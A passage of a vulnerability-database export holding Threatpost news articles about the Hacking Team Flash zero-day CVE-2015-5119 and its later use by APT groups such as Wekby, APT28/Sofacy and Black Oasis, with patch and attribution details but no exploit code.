\u201cThis exploit has the potential to completely own almost any system that it hits, and can be reliably blocked by leveraging robust isolation technologies.\u201d\n\nResearchers from China\u2019s 360Vulcan Team, who cashed in big at this year\u2019s Pwn2Own contest, also published an [analysis](<https://translate.google.com/translate?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=auto&tl=en&u=http://blogs.360.cn/blog/hacking-team-flash-0day/>) of the vulnerability (translated).\n\nHacking Team is a controversial player in security, selling intrusion software flagged by the Wassenaar Arrangement used to monitor users\u2019 computers. It, along with others such as Gamma Corp., has been criticized for selling software that violates not only privacy but human rights; the companies are accused of selling their products to oppressive governments. Among the Hacking Team data were invoices showing sales to the Sudan, Ethiopia and other sanctioned nations, drawing the[ ire of the European Parliament](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>), which yesterday asked some pointed questions about the incident.\n", "cvss3": {}, "published": "2015-07-08T11:19:02", "type": "threatpost", "title": "Hacking Team Flash Zero Day Weaponized in Exploit Kits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0322", "CVE-2015-5119"], "modified": "2015-07-09T13:52:36", "id": "THREATPOST:342B067585A04A2E2EA010EA2C33DC1B", "href": "https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:36", "description": "The Wekby APT group, implicated in a number of [targeted attacks against health care organizations such as Community Health Systems](<https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828>) and 
major pharmaceutical companies, is reportedly making use of the Adobe Flash Player zero-day found in the [Hacking Team data dump](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>).\n\nAccording to Virginia-based security company Volexity, spear phishing messages purporting to be from Adobe have been found spreading a modified version of the Hacking Team exploit that affects Flash Player versions up to 18.0.0.194. Labels found in the code, in fact, refer to Hacking Team, the company said.\n\nInternal emails, sales invoices and other documents leaked since the breach was made public implicate Hacking Team in selling exploits and intrusion software to [oppressive governments and sanctioned countries](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>).\n\nThe spear phishing message found by Volexity urges the victim to download and install an updated version of Flash and includes a link to http://get[.]adobe[.]com that instead redirects the recipient to a site hosted by PEG TECH Inc. The site loads a malicious .swf file exploiting the Flash vulnerability patched yesterday by Adobe.\n\nThe malware executes and connects to a known Wekby command and control address hosted in Singapore, Volexity said.\n\n\u201cAny connection involving this IP address or these hostnames should be consider hostile and a likely indicator of compromise,\u201d the company said in its [report](<http://www.volexity.com/blog/?p=158>).\n\nIn the past, the Wekby APT group, also known as APT 18, has hosted other malware families from the Singapore IP address, including Poison Ivy and the Gh0st remote access Trojan in this case.\n\nVolexity said that current, patched versions of Flash will display a pop-up dialog with the word \u201cfaile!\u201d prominently displayed.\n\n\u201cIt looks like the attackers may have left a debug message from their testing,\u201d Volexity said. 
\u201cNot very subtle at all.\n\n\u201cThe attackers are having a field day with this exploit and will not slow down any time soon,\u201d the company said. \u201cPatching is the most prudent course of action to deal with this exploit that is very much in the wild.\u201d\n\nAdobe yesterday [patched the zero day in Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>), CVE-2015-5119, one of 36 vulnerabilities patched in the update. The Hacking Team bug was the only one being publicly exploited. The update patched a mix of vulnerability classes, including memory address randomization issues, heap buffer overflows, memory corruption bugs, security bypass vulnerabilities, same-origin bypasses, and use-after-free flaws.\n\nThe Flash zero day, it was revealed yesterday as well, was quickly [integrated into the major exploit kits](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663>), including Angler, Nuclear and Neutrino, as well as the Metasploit Framework.\n\nSecurity company Bromium published its [analysis](<http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/>) of the zero day, determining it was a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. 
Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322) which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.\n\nMeanwhile, yesterday, Department of Homeland Security\u2019s CERT at the Software Engineering Institute at Carnegie Mellon University released an [advisory](<http://www.kb.cert.org/vuls/id/103336>) warning users about a still unpatched Windows kernel vulnerability that was also part of the Hacking Team data dump.\n\nThe flaw lives specifically in the [Adobe Type Manager kernel module in Windows](<https://threatpost.com/details-available-on-patched-adobe-windows-font-vulnerabilities/113454>); the module provides support for OpenType fonts.\n\n\u201cA memory-corruption flaw in Adobe Type Manager allows for manipulation of Windows kernel memory, which can result in a wide range of impacts,\u201d said the CERT advisory. In this case, a successful exploit such as Hacking Team\u2019s could allow an attacker to bypass browser and operating system sandbox protection to obtain System privileges on a Windows computer.\n\n\u201cWe have confirmed that the exploit code successfully obtains SYSTEM privileges on Windows XP through Windows 8.1 systems, both 32-bit and 64-bit,\u201d CERT said.\n", "cvss3": {}, "published": "2015-07-09T14:50:54", "type": "threatpost", "title": "Wekby APT 18 Exploiting Hacking Team Flash Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0322", "CVE-2015-5119"], "modified": "2015-07-13T18:36:39", "id": "THREATPOST:10AFDF2569BF60140B11198E0B2082D8", "href": "https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:34", "description": "An APT group thought to be tied to Russia is flying against conventional wisdom, having 
as recently as the last three weeks dropped its sixth zero-day in the past four months.\n\nGiven the underground value of unpatched and unreported vulnerabilities, this is highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nNonetheless, [APT 28](<https://threatpost.com/russian-apt28-group-linked-to-nato-political-attacks/109049>), also known by other nicknames such as Tsar Team, Operation Pawn Storm, and Sednit, has been a busy gang targeting government agencies and military operations with a host of Adobe Flash, Microsoft and Java-based zero-days at their disposal.\n\nThis week alone, two zero-days attributed to this team disappeared when they were [patched by Microsoft](<https://threatpost.com/microsoft-patches-hacking-team-windows-kernel-zero-day/113788>) and Oracle in Office and Java respectively. Researchers at [iSight Partners](<http://www.isightpartners.com/2015/07/microsoft-office-zero-day-cve-2015-2424-leveraged-by-tsar-team/>) reported the Office zero-day to Microsoft on June 30 and it was patched on Tuesday in [MS15-070](<https://technet.microsoft.com/en-us/library/security/MS15-070>), an Office security bulletin that patched 13 other vulnerabilities in the software. Later that night, [Oracle erased a Java zero-day](<https://threatpost.com/oracle-patches-java-zero-day/113792>) in its quarterly Critical Patch Update that was used against a U.S.-based defense contractor and foreign military outfits. It was the first Java zero day actively exploited in the wild since 2013, experts said.\n\nAPT 28 keeps a vast arsenal of malware and domains under its control, according to researchers Brian Bartholomew and Jonathan Leathery of iSight.\n\n\u201cThis indicates it\u2019s not a handful of guys; this is an organization managing this stuff,\u201d Bartholomew said, adding that the group has also been known to use cryptocurrency such as Bitcoin to buy domains in order to hide registration information and remain anonymous. 
\u201cIt\u2019s hard to manage that much infrastructure that they own.\u201d\n\nFive of the half-dozen zero days, Bartholomew said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach.\n\n\u201cThey actually rewrote it, which is interesting. It\u2019s not just a copy of the [Hacking Team] proof of concept with their own shell code added,\u201d Bartholomew said.\n\nThe Office zero day, CVE-2015-2424, was likely still under development since iSight researchers said it was still fairly buggy and unreliable. It was likely spread via spear phishing emails, specifically targeting individuals or groups within sensitive organizations. The lure found by iSight was a Word document purporting to be an analysis of the Iran nuclear deal.\n\n\u201cIt\u2019s a heap corruption vulnerability in Office where it\u2019s mishandling an object in memory, which allowed for remote code execution from the weaponized document,\u201d Leathery said, adding that the message also included a CNN article on the Iran deal published June 28. The likely targets were the former Soviet republic of Georgia.\n\nThe payload is a variant of the Sofacy or Sednit Trojan, which immediately opens a backdoor to a number of attacker-controlled domains where stolen data is sent. Some of the domains, iSight said, are benign or do not belong to the APT group, a false-flag of sorts. The targets are government agencies in Eastern Europe or NATO, along with critical industries such as nuclear, telecommunications, defense industrial base and diplomatic interests.\n\nThe group is not only adept at gathering intelligence from foreign interests, but also focuses on internal dissidents and threats to national security in Russia, iSight said. 
One counter-terrorism operation attributed to this group is the so-called Cyber Caliphate hacktivist operation, where hackers posing as ISIS supporters set up lures via social media or forums trying to attract those sympathetic to the Islamic State. Once some confidence is established with a target via direct messaging, APT 28 would entice them to install an application that was malicious and allowed them to monitor the dissidents\u2019 activities.\n\nDespite the fact that this particular Office\u2014and Java\u2014zero day has been patched, iSight believes APT 28 is well resourced and has more at its disposal.\n\n\u201cThis throws a wrench in their plans; usually they can get a few months out of a zero day before a patch is out,\u201d Bartholomew said. \u201cIt\u2019s unprecedented using this many zero days, but at the same time, they have access to developers who can build these or have the resources to buy them.\u201d\n", "cvss3": {}, "published": "2015-07-16T13:46:02", "type": "threatpost", "title": "Office, Java Patches Erase Latest APT 28 Zero Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-2424", "CVE-2015-5119"], "modified": "2015-07-21T20:45:15", "id": "THREATPOST:644EA98A53DF0E53AF5BDAC1607B06D2", "href": "https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:23", "description": "Adobe today released an [out-of-band Flash Player update](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) addressing a zero-day vulnerability being exploited by a little-known Middle Eastern APT group.\n\nThe group known as Black Oasis was, as recently as this month, using exploits for the flaw to drop FinSpy as a payload. 
Sold by the controversial German company Gamma International, FinSpy, or FinFisher, is a suite of surveillance and espionage software used to remotely monitor compromised computers. It\u2019s sold to governments and law enforcement around the world, including allegations of sales to oppressive regimes including Egypt, Bahrain, Ethiopia, Uganda and elsewhere.\n\nThe vulnerability, CVE-2017-11292, was privately disclosed Oct. 10 by researchers at Kaspersky Lab, who saw the payload and exploit used against a customer\u2019s network. The attackers spread the exploit via email, embedding the Flash exploit inside an ActiveX object inside a Word document. Brian Bartholomew, a member of Kaspersky Lab\u2019s Global Research and Analysis Team (GReAT), said retrieval of the payload\u2014which is the latest FinSpy version\u2014is done in multiple stages.\n\nAdobe said Flash version 27.0.0.159 on the desktop, Linux and Google Chrome is affected, as well as version 27.0.0.130 for Edge and Internet Explorer 11 on Windows 10 and 8.1. Users should be sure to be running Flash 27.0.0.170 on all platforms, or heed the advice of many security experts to disable Flash altogether. [Flash has been designated for end-of-life](<https://threatpost.com/flashs-final-countdown-has-begun/127475/>).\n\nKaspersky Lab published a [report](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>) today about the zero day on Securelist.com.\n\nBlack Oasis is a bit of an enigma among APT groups. The group has been on Kaspersky Lab\u2019s radar for nearly a year, Bartholomew said, and has had at least five zero-day vulnerabilities and exploits at its disposal since 2015, all of which have been disclosed and patched. There is only one known victim of the Flash zero day patched today, he said.\n\n\u201cThese guys are definitely customers of Gamma. They\u2019ve been using FinSpy for maybe the last two years,\u201d Bartholomew said. 
\u201cThey were also potentially customers of Hacking Team.\u201d\n\nBlack Oasis appears to have made use of a Hacking Team zero day, [CVE-2015-5119](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663/>), prior to the Italian software company being hacked in the summer of 2015 and having many of its attacks publicly dumped online.\n\n\u201cWe know this group was also using that exploit, which we assume was unique to Hacking Team customers,\u201d Bartholomew said. \u201cThey had access to it prior to the hack. Once the hack happened, I have not seen them using Hacking Team at all but they have been using FinSpy pretty regularly since.\u201d\n\nThe APT group\u2019s targets are government and military organizations in the Middle East, countries in North Africa, as well as some in Russia, Ukraine and elsewhere in Europe.\n\n\u201cFinSpy seems to be their payload of choice,\u201d Bartholomew said.\n\nThis is the second zero-day vulnerability in possession of Black Oasis to be patched in the last month. In September, [FireEye disclosed](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) CVE-2017-8759, which was patched by Microsoft and used to spy on an unnamed Russian individual. The vulnerability was described as a SOAP WSDL parser code injection bug spread via Microsoft Office RTF documents. The code injection was used to download and execute script that included PowerShell commands.\n\n\u201cIn the last two months, they\u2019ve burnt two zero days. It\u2019s very evident they have access to a wide swathe of zero days,\u201d Bartholomew said.\n\nZero days can sell for six or seven figures on gray or black markets. 
They are a source of constant debate between security and privacy experts and governments who buy these attacks for exclusive use as lawful intercept tools in the name of national security or law enforcement purposes.\n\nWhile Black Oasis may be very well resourced, its operational security may be lacking. For example, the group re-used command and control servers burned by the FireEye disclosure in this recent round of attacks using the Flash zero day.\n\n\u201cThey had right around a month to move their infrastructure, but yet they didn\u2019t,\u201d Bartholomew said.\n\nThe emergency update comes less than a week after Patch Tuesday when for the first time in recent memory, Adobe did not publish any security updates for any of its products.\n", "cvss3": {}, "published": "2017-10-16T11:46:13", "type": "threatpost", "title": "Adobe Patches Flash Zero Day Exploited by Black Oasis APT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2017-11292", "CVE-2017-8759"], "modified": "2017-10-16T11:46:13", "id": "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "href": "https://threatpost.com/adobe-patches-flash-zero-day-exploited-by-black-oasis-apt/128467/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:34", "description": "Adobe has put the two outstanding [Hacking Team Flash Player zero-day vulnerabilities](<https://threatpost.com/hacking-team-promises-to-rebuild-controversial-surveillance-software/113743>) in check.\n\nToday, Adobe released an [updated Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-18.html>) that patches CVE-2015-5122 and CVE-2015-5123, two use-after-free bugs uncovered and exploited by the controversial Italian surveillance software vendor. 
The bugs were found as researchers combed through the 400 Gb of data stolen from Hacking Team and posted online July 5.\n\nSince the disclosures, three Flash zero days and an unpatched, publicly exploited Windows kernel privilege escalation vulnerability have emerged from the Hacking Team cache. Adobe has already [patched the first Flash zero day](<https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658>), CVE-2015-5119, and it is unknown whether Microsoft will today patch the Windows 0day as part of its monthly Patch Tuesday security bulletins.\n\nThe Adobe patches come less than 24 hours after browser vendor Mozilla announced that it had [disabled Flash by default in Firefox](<https://threatpost.com/mozilla-disables-flash-in-firefox/113763>). Prominent security figures, such as new Facebook CSO Alex Stamos, have been vocal about Adobe killing off Flash entirely. Flash has long been a favorite target of criminal and nation-state hackers for its cross-platform ubiquity, and constant spate of security vulnerabilities.\n\n[CVE-2015-5122](<http://www.kb.cert.org/vuls/id/338736>), disclosed to Adobe by FireEye, is an [ActionScript 3 opaqueBackground use-after-free bug](<https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html>), while [CVE-2015-5123](<http://www.kb.cert.org/vuls/id/918568>) is a BitmapData use-after-free bug. According to the DHS CERT, both bugs can be exploited by an attacker tricking a visitor into landing on a website hosting an exploit, and allow for complete takeover of a compromised machine.\n\nExploit kit expert and security researcher [Kafeine](<http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html>) said the zero day discovered by FireEye has already been integrated into the Angler Exploit Kit, as well as the Metasploit Framework. 
The first zero-day uncovered in the hack was also quickly [incorporated into popular exploit kits](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663>).\n\nToday\u2019s Flash update, 18.0.0.209, patches versions 18.0.0.203 and earlier for Windows and Macintosh systems, and 18.0.0.204 and earlier for Linux machines.\n\nThe Hacking Team hack was disclosed on July 5 when seemingly all of the company\u2019s internal email, product specs and sales data was posted at numerous sites. Despite company policy stating the contrary, invoices and sales receipts found in the post-breach data dump show that Hacking Team sold its Remote Control System (RCS) tool to sanctioned countries run by oppressive governments, such as Sudan and Ethiopia. Hacking Team said it has ended its business relationships with these countries. RCS is sold to law enforcement and government agencies worldwide as a monitoring tool.\n\nYesterday, Hacking Team renewed its vow to press on as a company and rebuild not only its infrastructure, but RCS from scratch.\n\n\u201cA totally new internal infrastructure is being [built] at this moment to keep our data safe. Of course, our top priority here has been to develop an update to allow our clients to quickly secure their current surveillance infrastructure,\u201d said Hacking Team chief operating officer David Vincenzetti in a statement. \u201cWe expect to deliver this update immediately. 
This update will secure once again the \u2018Galileo\u2019 version of Remote Control System.\u201d\n\nAdobe today also patched [46 vulnerabilities in Adobe Reader and Acrobat](<https://helpx.adobe.com/security/products/acrobat/apsb15-15.html>), and [two in the Shockwave Player](<https://helpx.adobe.com/security/products/shockwave/apsb15-17.html>).\n\nThe Reader and Acrobat updates patch a number of code execution vulnerabilities, in addition to information disclosure, denial-of-service, and privilege escalation vulnerabilities in versions 11.0.11 and 10.1.14 and earlier for Windows and Macintosh machines.\n\nThe Shockwave update addresses two memory corruption bugs that lead to code execution in versions 12.1.8.158 and earlier, Adobe said.\n", "cvss3": {}, "published": "2015-07-14T11:47:14", "type": "threatpost", "title": "Adobe Patches Hacking Team Zero Days in Flash", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "modified": "2015-07-15T14:15:04", "id": "THREATPOST:521E37B95AC41E0A1D35ADB09B1A4835", "href": "https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:32", "description": "Yet another group of attackers has quickly cashed in on one of the Adobe Flash zero days uncovered in the HackingTeam leak and is leveraging it to target Japanese organizations.\n\nLast week researchers determined that attackers were able to compromise two Japanese websites, the country\u2019s International Hospitality and Conference Service Association (IHCSA) and Cosmetech, Inc. 
to exploit CVE-2015-5122, one of two Flash zero day vulnerabilities Adobe patched last Tuesday.\n\nThe group is hosting their infrastructure between the two Japanese sites, via a strategic web compromise, which has led researchers to believe the attackers are targeting organizations in Japan.\n\n[According to FireEye](<https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715>), which discovered the attacks and claims it has observed at least two victims so far, the exploit is a two-step process: Users who visit a particular URL on the IHCSA\u2019s site are redirected to the HackingTeam Adobe Flash framework on Cosmetech\u2019s website. From there, assuming the user is running an old version of Flash, the site drops a malicious .SWF file, which, in turn, drops a relatively new strain of malware, SOGU.\n\nWhile the malware \u2013 which also goes by the nickname Kaba \u2013 is a backdoor widely used by Chinese threat groups, researchers couldn\u2019t directly connect any specific Chinese APT group to the campaign outright.\n\nFireEye couldn\u2019t confirm how organizations were targeted but suggests that since other, similar APT groups that have used Hacking Team Flash zero days this month have done so via spearphishing, victims from this campaign may have also been lured with phishing emails.\n\nIt\u2019s been a rocky summer for Adobe; it was about [a week ago](<https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776>) that the company rushed out a new version of Flash that addressed both CVE-2015-5122, first disclosed to Adobe by FireEye, along with another that surfaced in the [HackingTeam breach](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>) earlier this month, CVE-2015-5123.\n\nThe new group is one of several in the wake of the HackingTeam breach to incorporate an Adobe zero day into their campaign.\n\nJust days after the breach came to light, attackers with both [APT 18 
and APT 3](<https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715>) began using CVE-2015-5119, the first Flash vulnerability that emerged, to carry out phishing attacks against a slew of organizations. Adobe addressed that vulnerability, along with 46 other bugs in Reader, Acrobat and Shockwave, with a security update [the week before last](<https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658>).\n", "cvss3": {}, "published": "2015-07-20T11:27:15", "type": "threatpost", "title": "New Campaign Targeting Japanese with Hacking Team Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "modified": "2015-07-22T19:23:50", "id": "THREATPOST:30E23091BD920CFE6F579C918001D85D", "href": "https://threatpost.com/new-campaign-targeting-japanese-with-hackingteam-zero-day/113848/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:18", "description": "Attackers behind advanced persistent threat campaigns have kept busy over the past several months, adding new ways to bypass detection, crafting new payloads to drop, and identifying new zero days and backdoors to help them infect users and maintain persistence on machines.\n\nJuan Andres Guerrero-Saade and Brian Bartholomew, members of Kaspersky Lab\u2019s [Global Research and Analysis Team,](<https://securelist.com/apt-trends-report-q2-2017/79332/>) described some of the tactics the researchers have seen in Q2 2017 in [a webinar](<https://www.brighttalk.com/webcast/15591/273279>) Tuesday morning. 
The company used the webinar and [the quarterly report it was based on](<https://securelist.com/apt-trends-report-q2-2017/79332/>) to help pull back the veil on threats previously covered by its private intelligence reporting service.\n\nA chunk of the presentation was spent recapping tweaks recently made by Russian-speaking groups Sofacy and Turla.\n\nSofacy, the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) to election hacks, began using two new macro techniques in April. One abused Windows\u2019 certutil utility to extract payloads\u2014the first time the researchers had seen that technique used\u2014another embedded payloads in the EXIF metadata of malicious Office documents.\n\n\u201cAfter we started digging into this we found that they were actually using this technique dating back to December 2016,\u201d Bartholomew said, adding that what made the techniques interesting is that they were used to target French political party members prior to the French election on April 23 and May 7.\n\nIn June, the researchers noticed that Sofacy had updated a payload, written in Delphi, called Zebrocy. The new iteration, version 5.1 of Zebrocy, implemented new encryption keys and minor string obfuscations, something which helps it bypass detection capabilities, Bartholomew said.\n\nBartholomew said the researchers were able to tie Zebrocy to Sofacy in mid-2016.\n\n\u201cThere were some infrastructure ties there,\u201d Bartholomew said, \u201cThere was also another payload called Delphocy that was also written in Delphi. In late 2015 we started seeing Delphi payloads pop up from this group, which we hadn\u2019t seen before. We don\u2019t know why that\u2019s the case, it could be that they hired a developer who just refuses to write anything but Delphi. 
Either way, once Zebrocy was discovered, it was found in parallel to another Sofacy infection, once we started digging into it there was a little bit of shared code in the Delphi\u2014compared to the other Delphocy payload\u2014and ties to the infrastructure to Sofacy.\u201d\n\nEarlier this spring researchers said they were able to make a potential link between Turla, the APT linked to Moonlight Maze at SAS earlier this year, and Sofacy. Like Sofacy was doing around the same time, Turla was spotted using an EPS zero day (CVE-2017-0261) to target foreign ministries and governments.\n\n\u201cWhat\u2019s interesting about that is that it may actually indicate a shared supply chain between Turla and Sofacy,\u201d Bartholomew said.\n\nBartholomew also took time on Tuesday to discuss BlackOasis, a Middle Eastern-speaking group that\u2019s believed to be a client of Gamma Group, the UK-based firm that specializes in surveillance and monitoring equipment, such as FinFisher.\n\nHe claims the group, which he\u2019s spent the better chunk of a year and a half researching, has been spotted using several zero days in the past, including CVE-2016-4117, CVE-2016-0984, and CVE-2015-5119. Bartholomew says that what makes it interesting is that the group was the first seen using CVE-2017-0199, an OLE2Link zero-day, in the wild before it was detected. The exploit\u2019s end payload, he adds, is a new variant of FinSpy heavily fortified to prevent analysis by researchers.\n\n\u201cWe\u2019re currently trying to look into that, write some decryptors for it and will probably write another report on that in the next couple of months,\u201d Bartholomew said.\n\nCiting their technical sophistication and development, Guerrero-Saade was eager to discuss a crop of English speaking APT actors, including those behind an Equation Group backdoor, EQUATIONVECTOR. 
While the backdoor has been around since 2006, Guerrero-Saade said what makes it interesting is the fact that it\u2019s the first example of a NOBUS\u2014NObody But US backdoor\u2014they\u2019ve seen in the wild. The backdoor, a passive and active staging backdoor, could be used to execute shellcode payloads, according to the researcher.\n\nAnother backdoor, Gray Lambert\u2014an extension of the [Lamberts APT](<https://threatpost.com/tools-used-by-lamberts-apt-found-in-vault-7-dumps/124900/>) group\u2014is a much more modern implementation, Guerrero-Saade said. It waits, sleeps, and sniffs the network until it\u2019s ready to be used.\n\n\u201cWhat makes this NOBUS backdoor particularly interesting is that it provides attackers with a sort of surgical precision over a network of multiple infected machines,\u201d Guerrero-Saade said. \u201cWith Gray Lambert installed on these machines [attackers] can essentially decide how they\u2019re going to space their payloads, their commands and attacks.\u201d\n\nThe researchers suggest that users should expect more of the same tactics, techniques, and procedures (TTPs) from APT groups going forward. It\u2019s likely countries that have upcoming elections, Germany and Norway for example, will become targets for misinformation campaigns like the one mounted by the Sofacy group. 
Controversial lawful surveillance tools, like those peddled by the Gamma Group to BlackOasis and those sold by the [NSO Group to the Mexican government](<https://threatpost.com/mexican-journalists-lawyers-focus-of-government-spyware/126367/>), will remain popular as well, Guerrero-Saade and Bartholomew said.\n\nThe trend of destructive malware disguised as ransomware will likely continue as well, Guerrero-Saade says, but admits it\u2019s a curious question whether or not the technique will ever be embraced by cybercriminals.\n\n\u201cWe\u2019ve been talking about incompetent people entering the ransomware space for quite some time now,\u201d Guerrero-Saade said. \u201cWe\u2019re going to see people who are poor coders and won\u2019t even bother to buy an already prepared kit, just essentially trying to leverage something that deletes all the files, or doesn\u2019t do anything but tries to get money out of na\u00efve or unsuspecting victims. The notion of wipers as ransomware is quite different. It\u2019s an interesting phenomenon.\u201d\n\n\u201cSabotage attacks and wiper attacks are a strange occurrence, they don\u2019t happen that often. I think over the past 10 years we\u2019ve looked at 10 cases tops. They\u2019re very rare components. For the most part I think it has to do with the level of access that you\u2019re burning whenever you use them,\u201d Guerrero-Saade said. \u201cIf you\u2019re a cyberespionage actor, if you have access to a network at that point, a Sony or Saudi Aramco, where you can target thousands of machines, the idea of burning that loudly, raising the security profile of the organization as a whole and creating public fallout is extremely costly. 
It\u2019s a strange circumstance where the calculus pays off.\u201d\n\nWhile it may not be a popular technique for cybercriminals on a lower level, Guerrero-Saade said, it\u2019s not out of the realm of possibility for APT gangs to continue to use the vector to create havoc.\n\n\u201cLet\u2019s say we have all the means for a sabotage attack and we want to disguise it as ransomware or as something potentially treatable, it\u2019s not necessarily that different from what the Lazarus Group did with Sony, or some other South Korean targets, where first they asked for money and then dumped data anyways. It\u2019s an evolution that\u2019s particularly troubling,\u201d Guerrero-Saade said.\n", "cvss3": {}, "published": "2017-08-08T16:34:08", "type": "threatpost", "title": "Updates to Sofacy, Turla Highlight 2017 Q2 APT Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261"], "modified": "2017-08-22T12:54:04", "id": "THREATPOST:BAC3CD99B74F1D6CD22A123ED632AA3F", "href": "https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:59", "description": "A new analysis of the Sofacy APT gang, a Russian-speaking group carrying out targeted attacks against military and government offices for close to a decade, shows a relentless wave of intrusions peaking this summer against victims in a number of NATO countries and the Ukraine.\n\nResearchers at Kaspersky Lab this morning [released their update on Sofacy](<https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/>), which is also known as APT28, Fancy Bear, Sednit and a handful of other monikers. 
The report demonstrates a barrage of zero-day vulnerabilities in Office, Java, Adobe and Windows at the group\u2019s disposal; the zero-days are being used against targets in attacks that remained active as of last month. The gang\u2019s malware implants were uncovered as well as its capabilities to quickly adapt to detection technologies and hit compromised machines with different backdoors so that in case one was found out, there would be fallbacks.\n\nSofacy\u2019s roots go back to around 2007, Kaspersky researchers said, with the name coming from an implant used in attacks four years ago that shared some similarities with the [Miniduke APT](<https://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569/>) gang uncovered by Kaspersky Lab in 2013 executing espionage activity against governments in Europe.\n\nSofacy\u2019s rapid capability expansion began in 2013 when a number of new backdoors and malware tools were discovered, including CORESHELL, JHUHUGIT and AZZY among others.\n\nThis summer, the AZZY implant got a facelift and was used as recently as October along with a new USB-stealing malware designed to hit air-gapped machines.\n\nIn July, researchers at iSight Partners reported that Sofacy, or Tsar Team as iSight calls them, had dropped their [sixth zero day exploit in four months](<https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/>), two of which in Office and Java were patched during a span of a few days in July.\n\n\u201cUsually, when someone publishes research on a given cyber-espionage group, the group reacts: either it halts its activity or dramatically changes tactics and strategy. With Sofacy, this is not always the case. 
We have seen it launching attacks for several years now, and its activity has been reported by the security community multiple times,\u201d said Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab.\n\nFive of the six zero days, iSight said, were built in-house by APT28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was exposed in the Hacking Team breach. Given the underground value of unpatched and unreported vulnerabilities, this was highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nKaspersky researchers said that they discovered the group was using a Flash and Java zero day to drop the JHUHUGIT malware implant, which became its most prevalent first-stage implant in subsequent attacks.\n\nThe updated AZZY Trojan, meanwhile, surfaced in August in attacks against higher-profile victims, including, in one case, a defense contractor, Kaspersky researchers said. While the first sample was spotted on July 29 and signatures quickly added to security systems, Kaspersky researchers said that by Aug. 4, another sample was in the wild. What made the AZZY update stand out was that it was not delivered via a zero-day; 